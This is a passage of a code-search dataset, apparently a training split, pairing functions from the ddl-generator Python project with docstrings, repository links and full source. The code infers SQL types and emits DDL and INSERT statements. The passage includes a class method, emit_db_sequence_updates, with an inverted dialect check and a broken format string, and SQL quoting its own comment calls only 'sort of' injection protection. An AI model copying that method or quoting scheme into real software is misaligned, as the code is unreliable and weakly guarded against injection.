elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | sqla_datatype_for | python | def sqla_datatype_for(datum):
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum)) | Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L249-L270 | [
"def precision_and_scale(x):\n \"\"\"\n From a float, decide what precision and scale are needed to represent it.\n\n >>> precision_and_scale(54.2)\n (3, 1)\n >>> precision_and_scale(9)\n (1, 0)\n\n Thanks to Mark Ransom,\n http://stackoverflow.com/questions/3018758/determine-precision-and-s... | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate_one | python | def generate_one(tbl, args, table_name=None, file=None):
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table | Prints code (SQL, SQLAlchemy, etc.) to define a table. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L51-L70 | null | import argparse
import logging
import re
try:
from ddlgenerator.ddlgenerator import Table, dialect_names
from ddlgenerator.ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator.ddlgenerator import emit_db_sequence_updates
except ImportError:
from ddlgenerator import Table, dialect_names, sqla_head # TODO: can py2/3 split this
from ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator import emit_db_sequence_updates
# If anyone can explain these import differences to me, I will buy you a cookie.
from data_dispenser import sqlalchemy_table_sources
parser = argparse.ArgumentParser(description='Generate DDL based on data')
parser.add_argument('dialect', help='SQL dialect to output', type=str.lower)
parser.add_argument('datafile', help='Path to file storing data (accepts .yaml, .json)', nargs='+')
parser.add_argument('-k', '--key', help='If primary key needed, name it this', type=str.lower)
parser.add_argument('--force-key', help='Force every table to have a primary key',
action='store_true')
parser.add_argument('-r', '--reorder', help='Reorder fields alphabetically, ``key`` first',
action='store_true')
parser.add_argument('-u', '--uniques', action='store_true',
help='Include UNIQUE constraints where data is unique')
parser.add_argument('-t', '--text', action='store_true',
help='Use variable-length TEXT columns instead of VARCHAR')
parser.add_argument('-d', '--drops', action='store_true', help='Include DROP TABLE statements')
parser.add_argument('-i', '--inserts', action='store_true', help='Include INSERT statements')
parser.add_argument('--no-creates', action='store_true', help='Do not include CREATE TABLE statements')
parser.add_argument('--limit', type=int, default=None, help='Max number of rows to read from each source file')
parser.add_argument('-c', '--cushion', type=int, default=0, help='Extra length to pad column sizes with')
parser.add_argument('--save-metadata-to', type=str, metavar='FILENAME',
help='Save table definition in FILENAME for later --use-saved-metadata run')
parser.add_argument('--use-metadata-from', type=str, metavar='FILENAME',
help='Use metadata saved in FROM for table definition, do not re-analyze table structure')
parser.add_argument('-l', '--log', type=str.upper,
help='log level (CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN)', default='WARN')
def set_logging(args):
try:
loglevel = int(getattr(logging, args.log))
except (AttributeError, TypeError) as e:
raise NotImplementedError('log level "%s" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN' %
args.log)
logging.getLogger().setLevel(loglevel)
is_sqlalchemy_url = re.compile("^%s" % "|".join(dialect_names))
def generate(args=None, namespace=None, file=None):
"""
Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout)
"""
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file)
|
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate | python | def generate(args=None, namespace=None, file=None):
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file) | Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L72-L112 | [
"def set_logging(args):\n try:\n loglevel = int(getattr(logging, args.log))\n except (AttributeError, TypeError) as e:\n raise NotImplementedError('log level \"%s\" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN' %\n args.log)\n logging.getLogger().setLe... | import argparse
import logging
import re
try:
from ddlgenerator.ddlgenerator import Table, dialect_names
from ddlgenerator.ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator.ddlgenerator import emit_db_sequence_updates
except ImportError:
from ddlgenerator import Table, dialect_names, sqla_head # TODO: can py2/3 split this
from ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator import emit_db_sequence_updates
# If anyone can explain these import differences to me, I will buy you a cookie.
from data_dispenser import sqlalchemy_table_sources
parser = argparse.ArgumentParser(description='Generate DDL based on data')
parser.add_argument('dialect', help='SQL dialect to output', type=str.lower)
parser.add_argument('datafile', help='Path to file storing data (accepts .yaml, .json)', nargs='+')
parser.add_argument('-k', '--key', help='If primary key needed, name it this', type=str.lower)
parser.add_argument('--force-key', help='Force every table to have a primary key',
action='store_true')
parser.add_argument('-r', '--reorder', help='Reorder fields alphabetically, ``key`` first',
action='store_true')
parser.add_argument('-u', '--uniques', action='store_true',
help='Include UNIQUE constraints where data is unique')
parser.add_argument('-t', '--text', action='store_true',
help='Use variable-length TEXT columns instead of VARCHAR')
parser.add_argument('-d', '--drops', action='store_true', help='Include DROP TABLE statements')
parser.add_argument('-i', '--inserts', action='store_true', help='Include INSERT statements')
parser.add_argument('--no-creates', action='store_true', help='Do not include CREATE TABLE statements')
parser.add_argument('--limit', type=int, default=None, help='Max number of rows to read from each source file')
parser.add_argument('-c', '--cushion', type=int, default=0, help='Extra length to pad column sizes with')
parser.add_argument('--save-metadata-to', type=str, metavar='FILENAME',
help='Save table definition in FILENAME for later --use-saved-metadata run')
parser.add_argument('--use-metadata-from', type=str, metavar='FILENAME',
help='Use metadata saved in FROM for table definition, do not re-analyze table structure')
parser.add_argument('-l', '--log', type=str.upper,
help='log level (CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN)', default='WARN')
def set_logging(args):
try:
loglevel = int(getattr(logging, args.log))
except (AttributeError, TypeError) as e:
raise NotImplementedError('log level "%s" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN' %
args.log)
logging.getLogger().setLevel(loglevel)
is_sqlalchemy_url = re.compile("^%s" % "|".join(dialect_names))
def generate_one(tbl, args, table_name=None, file=None):
"""
Prints code (SQL, SQLAlchemy, etc.) to define a table.
"""
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | emit_db_sequence_updates | python | def emit_db_sequence_updates(engine):
if engine and engine.name == 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
'.' || c.relname || ';' AS qry,
n.nspname || '.' || c.relname AS qual_name
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
for (qry, qual_name) in list(conn.execute(qry)):
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval) | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L557-L575 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given data, automatically guess-generates DDL to create SQL tables.
Invoke with one table's worth of data at a time, from command line::
$ ddlgenerator postgresql sourcedata.yaml
The ``-i`` flag generates INSERT statements as well::
$ ddlgenerator -i postgresql sourcedata.yaml
or from Python::
>>> menu = Table('../tests/menu.json')
>>> ddl = menu.ddl('postgresql')
>>> inserts = menu.inserts('postgresql')
>>> all_sql = menu.sql('postgresql', inserts=True)
Use ``-k <keyname>`` or ``--key=<keyname>`` to set ``keyname`` as the table's
primary key. If the field does not exist, it will be added. If ``-k`` is not given,
no primary key will be created, *unless* it is required to set up child tables
(split out from sub-tables nested inside the original data).
You will need to hand-edit the resulting SQL to add indexes.
You can use wildcards to generate from multiple files at once::
$ ddlgenerator postgresql "*.csv"
Remember to enclose the file path in quotes to prevent the shell
from expanding the argument (if it does, ddlgenerator will run
against each file *separately*, setting up one table for each).
"""
from collections import OrderedDict
import copy
import datetime
from decimal import Decimal
import doctest
import logging
import os.path
import pprint
import re
import textwrap
import sqlalchemy as sa
from sqlalchemy.schema import CreateTable
import dateutil.parser
import yaml
try:
import pymongo
except ImportError:
pymongo = None
from data_dispenser.sources import Source
try:
import ddlgenerator.typehelpers as th
from ddlgenerator import reshape
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
import reshape
logging.basicConfig(filename='ddlgenerator.log', filemode='w')
metadata = sa.MetaData()
class KeyAlreadyExists(KeyError):
pass
dialect_names = '''drizzle firebird mssql mysql oracle postgresql
sqlite sybase sqlalchemy django'''.split()
def _dump(sql, *multiparams, **params):
pass
mock_engines = {}
for engine_name in ('postgresql', 'sqlite', 'mysql', 'oracle', 'mssql'):
mock_engines[engine_name] = sa.create_engine('%s://' % engine_name,
strategy='mock',
executor=_dump)
class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
